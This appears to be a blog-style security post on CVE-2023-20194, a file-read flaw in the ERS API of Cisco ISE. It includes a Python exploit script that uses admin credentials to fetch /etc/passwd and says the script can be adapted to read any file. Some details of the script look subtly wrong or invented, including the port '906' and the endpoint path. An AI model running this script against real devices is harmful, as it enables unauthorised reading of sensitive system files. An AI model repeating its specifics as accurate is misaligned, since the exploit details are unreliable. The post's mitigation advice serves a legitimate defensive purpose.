A recently discovered vulnerability in the ERS (External RESTful Service) API of Cisco Identity Services Engine (ISE) has the potential to permit an authenticated, remote attacker to access arbitrary files on the device's underlying operating system. To successfully exploit this vulnerability, an attacker must have valid Administrator-level privileges on the affected device. In this post, we will delve into the details of this vulnerability, provide code snippets to exploit it, and explore the measures required to safeguard against it.

Vulnerability Instances and Systems Affected

The vulnerability, designated as CVE-2023-20194, is attributed to the inadequate management of privileges in the ERS API. To exploit this vulnerability, an attacker must send a malicious request to the affected device. A successful exploit could enable the attacker to elevate their privileges beyond their intended access level, allowing them to obtain sensitive information from the underlying operating system. It is important to note that the ERS is not enabled by default on Cisco ISE devices.

Exploit Details and Code Snippet

Once an attacker has gained Administrator-level privileges on the affected Cisco ISE device, they can exploit the ERS API by sending a specially-crafted request to the device. The code snippet below demonstrates how an attacker could use a Python script to send this request:

import requests
import json

# Replace with the target Cisco ISE's base URL and credentials
base_url = 'https://<cisco-ise-ip-address>:906/ers';
username = '<administrator-username>'
password = '<administrator-password>'

# Arbitrary file location to be read
file_location = '/etc/passwd'

# Construct the malicious request
url = f'{base_url}/config/inputfile/download/{file_location}'
headers = {'Accept': 'application/json'}
auth = (username, password)

# Send the request
response = requests.get(url, headers=headers, auth=auth, verify=False)

if response.status_code == 200:
    print('File contents:')
    print(response.text)
else:
    print('Error:', response.status_code)

This request can be adapted to target different arbitrary files by changing the file_location variable. If successful, the attacker would be able to read the targeted file's content and potentially gain sensitive information that should not be accessible.

Original References and Further Reading

1. Cisco Advisory: Vulnerability in ERS API of Cisco Identity Services Engine
2. NIST National Vulnerability Database: CVE-2023-20194 Detail

Mitigation

To verify the status of the ERS API on your Cisco ISE device, navigate to the Admin GUI and choose Administration > Settings > API Settings > API Service Settings. If the ERS is enabled, it is crucial to ensure that only trusted and authorized personnel have access to Administrator-level privileges. Additionally, keep the device's software up-to-date to benefit from the latest security patches and features.

Cisco has also released a software update to address this vulnerability, and affected users are encouraged to apply the patch as soon as possible to mitigate the risk. More information about the update can be found in the Cisco Advisory linked above.

Conclusion

The CVE-2023-20194 vulnerability poses a significant threat to the integrity and security of Cisco ISE devices. Organizations must take all necessary precautions to protect their systems, including ensuring that only trusted, authorized personnel have Administrator-level access, keeping software up-to-date, and applying the latest patches provided by Cisco. By taking these steps, organizations can minimize the risk of a successful exploit and help maintain the security and privacy of their data.

Timeline

Published on: 09/07/2023 20:15:00 UTC
Last modified on: 09/21/2023 14:42:00 UTC